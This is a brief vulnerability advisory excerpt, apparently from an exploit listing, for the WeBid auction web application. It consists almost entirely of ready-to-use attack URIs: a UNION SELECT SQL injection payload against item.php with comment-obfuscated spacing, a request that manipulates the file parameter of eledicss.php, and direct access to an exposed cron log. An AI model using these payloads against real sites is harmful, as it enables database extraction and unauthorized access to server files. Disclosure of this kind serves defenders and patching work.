| Code |
An attacker can exploit these issues via a browser. The following example URIs are available:http://www.example.com/webid/eledicss.php?nid=0&cd=themes/default&file=style.css http://www.example.com/webid/logs/cron.log http://www.example.com/webid/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* |